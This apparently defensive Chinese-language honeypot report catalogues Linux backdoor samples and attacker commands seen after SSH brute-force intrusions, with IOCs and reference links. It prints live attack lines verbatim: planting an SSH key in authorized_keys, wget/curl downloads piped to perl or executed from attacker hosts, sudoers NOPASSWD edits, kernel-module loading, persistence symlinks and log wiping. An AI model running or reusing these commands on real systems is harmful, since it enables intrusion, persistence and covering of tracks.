bash -c cd ~ && rm -rf .ssh && mkdir .ssh && echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

IOC

  • 137.184.228.225

参考链接

https://www.virustotal.com/gui/ip-address/137.184.228.225/community

简述

该样本行为特征中,存在访问恶意IP,文件删除等行为,推测为通过ssh爆破进入的后门样本

样本类型

后门,控制

elkeid 样本ID

elkeid_20220609_backdoor_2

捕获时间

  • 20220609

最近活跃时间

  • 20221115

已知入侵途径

  • ssh爆破

涉及样本

  • 无样本

主要行为

  • 重命名基本命令

/bin/busybox cp /bin/echo yy

  • 访问恶意IP /tmp/yy a49.142.208.62:26987 a49.142.208.20:26987 a49.142.208.20:26987 a49.142.208.20:26987 a49.142.208.20:26987 a49.142.208.20:26987 a49.142.208.20:26987 a49.142.208.20:26987 k22

  • 文件下载

/bin/busybox tftp -g -l - -r yCz31g9 49.142.208.62

  • 文件删除

/bin/busybox rm /sys/fs/cgroup/unified/.none

/bin/busybox rm /sys/fs/cgroup/systemd/.none

IOC

参考链接

https://www.virustotal.com/gui/url/ec3b9e28d04437baec43a74b3d05f1b31639544a9ef98e19ecfb369d7a1e33e4/detection

报告信息

简述

g6h7是一系列相似名称后门类型的样本的简称,会根据不同的系统执行不同的后门程序,如

g6h7.arm,g6h7.wrt等

样本类型

后门

elkeid 样本ID

elkeid_20220809_backdoor_1

捕获时间

  • 20220809

最近活跃时间

  • 20221118

已知入侵途径

  • 弱口令爆破

涉及样本

  • /root/g6h72.6
  • g6h7.arm
  • g6h7.wrt
  • g6h7.mips

主要行为

  • 关闭iptables

systemctl stop iptables.service

  • 恶意样本执行

nohup /root/g6h72.6

  • 根据不同系统执行恶意样本

chmod 777 g6h72.6;chmod 777 g6h7.arm

  • 执行脚本

sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p

  • 处理密码请求

/bin/systemd-tty-ask-password-agent --watch

  • 查看全部socket 单元

systemctl list-unit-files --full --type=socket

  • 不挂起执行

nohup /root/g6h72.6

IOC

  • URL 183.57.157.118

参考链接

简述

该样本行为特征中,存在访问恶意IP,加载内核模块,建立后门等行为,与gates后门样本有相似行为,推测为通过ddos进入的后门样本

样本类型

后门,控制

elkeid 样本ID

elkeid_20221111_backdoor_4

捕获时间

  • 20221111

最近活跃时间

  • 20221115

关键词

S97DbSecuritySpt,bsd-port

已知入侵途径

  • ssh暴破
  • ddos

主要行为

  • 重命名

    • cp -f /usr/bin/service /usr/bin/.sshd
    • cp -f /usr/bin/service /usr/bin/bsd-port/getty
    • cp -f /usr/bin/apache /usr/bin/.sshd
    • cp -f /usr/bin/apache /usr/bin/bsd-port/getty
    • cp -f /usr/bin/bsd-port/getty /bin/ps
    • cp -f /usr/bin/bsd-port/getty /bin/ss
    • cp -f /usr/bin/bsd-port/getty /usr/bin/ps
    • cp -f /usr/bin/bsd-port/getty /usr/bin/ss
  • 加载内核模块

    • insmod /usr/bin/bsd-port/xpacket.ko
    • insmod /usr/bin/xpacket.ko
  • 文件下载

    • curl -O http://103.116.45.104:11230/service
    • curl -O http://103.99.209.43:222/apache
  • 创建恶意后门软连接

    • ln -s /etc/init.d/DbSecuritySpt /etc/rc1.d/S97DbSecuritySpt
    • ln -s /etc/init.d/DbSecuritySpt /etc/rc2.d/S97DbSecuritySpt
    • ln -s /etc/init.d/DbSecuritySpt /etc/rc3.d/S97DbSecuritySpt
    • ln -s /etc/init.d/DbSecuritySpt /etc/rc4.d/S97DbSecuritySpt
    • ln -s /etc/init.d/DbSecuritySpt /etc/rc5.d/S97DbSecuritySpt
    • ln -s /etc/init.d/selinux /etc/rc1.d/S99selinux
    • ln -s /etc/init.d/selinux /etc/rc2.d/S99selinux
    • ln -s /etc/init.d/selinux /etc/rc3.d/S99selinux
    • ln -s /etc/init.d/selinux /etc/rc4.d/S99selinux
    • ln -s /etc/init.d/selinux /etc/rc5.d/S99selinux
  • 清理痕迹

    • rm -rf service

IOC

参考链接

http://www.ttlsa.com/safe/linux-antivirus-action/

https://cloud.tencent.com/developer/article/1459350

简述

该报告整理了elkeid 蜜罐收集的ssh暴破后,攻击行为及其关联IOC的整理

关键词:

ifjeeisurofmioufiose

时间

20220530

IP

179.43.167.75

执行命令

bash -c sudo hive-passwd set ifjeeisurofmioufiose; sudo hive-passwd ifjeeisurofmioufiose; pkill Xorg; pkill x11vnc; pkill Hello; systemctl stop shellinabox; history -c; cat /hive-config/rig.conf; uname -a

关联情报

https://www.virustotal.com/gui/ip-address/179.43.167.75

https://threat.gg/attackers/49393300-3dc3-4185-a004-d41e761fe492

关键词:

finalshell_separator

时间

20221128

IP

107.189.7.193

执行命令

bash -c export LANG=en_US;export LANGUAGE=en_US;export LC_ALL=en_US;free;echo finalshell_separator;uptime;echo finalshell_separator;cat /proc/net/dev;echo finalshell_separator;df;echo finalshell_separator;sleep 1;free;echo finalshell_separator;uptime;echo finalshell_separator;cat /proc/net/dev;echo finalshell_separator;df;echo finalshell_separator;

关联情报

https://www.virustotal.com/gui/url/347ec978ed27fc947fbe5d6f051b45a85f08acfee1d0d3f8d9e7d0b502a64934

关键词:

wtmp.honeypot,secscan

时间

20221103

IP

182.150.22.222

执行命令

/bin/bash -c echo secscan:secscan | chpasswd (新建用户)

pam_tally2 secscan

/usr/sbin/rsyslogd -n -iNONE

bash -c sd report|grep "Data center"|awk '{print $3}'

chmod 777 i686

./i686 server

mv /var/log/wtmp /var/log/wtmp.honeypot

参考链接

https://www.virustotal.com/gui/url/4f33bb16afb6b7942dc61cd6250c68cc242cff18310a99d15bb8f5a3041cfc36/detection

关键词:

alternatives,[Mm]iner

时间

20221203

IP

36.110.228.254

执行命令

bash -c ps | grep [Mm]iner

tar -df alternatives.tar.0 -C /var/lib/dpkg alternatives

bash -c cat /proc/cpuinfo (收集系统信息)

ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

其中ps进程树如下,似乎存在异常?

|1054.0 bash -c ps | grep [Mm]iner (ppid_argv:/usr/sbin/sshd -D )                          
|-1055.0 ps
|--1057.0 ps.original
|---1064.0 service crond start
|---1062.0 pkill -9 32678
|---1063.0 sh -c /etc/32678&
|---1066.0 /root/ps.original
|--1058.0 grep -v zzh|pnscan
|-1056.0 grep [Mm]iner

参考链接

https://www.virustotal.com/gui/url/75cbd6ad081bdc9cd0c66c115d44a5fc8c5366626f485a8e09fa6b4d12d68a24

关键词:

ns3.jpg,oto,sos.vivi.sg

时间

20220801

IP

45.64.130.149

执行命令

bash -c uname -a;id;cat /etc/shadow /etc/passwd;lscpu;

echo daemon ALL=(ALL) NOPASSWD: ALL >> /etc/sudoers;chsh -s /bin/sh daemon;

echo Password123 |passwd daemon --stdin;

chattr -ia /root/.ssh/ ;

wget http://sos.vivi.sg/ns1.jpg -O ~/.ssh/authorized_keys;(写入认证密钥)

chmod 600 ~/.ssh/authorized_keys;wget -qO - http://sos.vivi.sg/ns2.jpg|perl;(执行)

wget http://sos.vivi.sg/ns3.jpg -O /tmp/x;chmod +x /tmp/x;/tmp/x;mv /tmp/x /tmp/o;/tmp/o;rm -f /tmp/o;

mkdir /sbin/.ssh;cp ~/.ssh/authorized_keys /sbin/.ssh;(保存修改后的密钥)

chown daemon.daemon /sbin/.ssh /sbin/.ssh/;chmod 700 /sbin/.ssh;chmod 600 /sbin/.ssh/authorized_keys;

wget http://sos.vivi.sg/oto -O /etc/oto;chmod 755 /tmp/oto;/tmp/oto;curl http://sos.vivi.sg/oto -o /tmp/oto;chmod 755 /tmp/oto;/tmp/oto;rm -f /tmp/oto (执行并清除痕迹)

参考链接

  • 45.64.130.149

https://www.virustotal.com/gui/url/45e78bf413d5dcc2fbb8711f5d47cb41f6fe2e7826f5a147690000abf8632801

  • http://sos.vivi.sg

https://www.virustotal.com/gui/url/98b904c279e990009d48b50527eb1f726f7f6b30a3632d43b7c37b4a0326d768

关键词:

q(&%^#$SHH?M?A-k3f49!^ZaTk?leSH@q!@#D0\nS97pp7fcZ1qu\nS97pp7fcZ1qu

时间

20220808

IP

137.184.228.225

执行命令

bash -c echo -e q(&%^#$SHH?M?A-k3f49!^ZaTk?leSH@q!@#D0\nS97pp7fcZ1qu\nS97pp7fcZ1qu|passwd|bash

参考链接

  • 137.184.228.225

https://www.virustotal.com/gui/url/921ef4be53465a028e26cf7edc4e3bdc84fef4f28fe78215a4de0c979e274f06

关键词: games, x

时间

20230212

IP

173.244.55.81

执行命令

  • mkdir games
  • adduser x
  • /sbin/groupadd -g 1001 x
  • touch /var/run/utm
  • cat /proc/cpuinfo
  • rm -rf /var/run/utmp
  • touch /root/.bash_history
  • touch /var/log/wtmp
  • rm -rf /var/log/wtmp
  • rm -rf /root/.bash_history
  • sh -c cd /etc/skel; find . -print

参考链接

关键词:BC20mxv7lX91

时间

20230103

IP

186.6.226.172

执行命令

  • 删除.ssh并写入密钥

bash -c cd ~ && rm -rf .ssh && mkdir .ssh && echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr>>.ssh/authorized_keys && chmod -R go= /.ssh && cd

  • 更改密码

bash -c echo root:BC20mxv7lX91|chpasswd|bash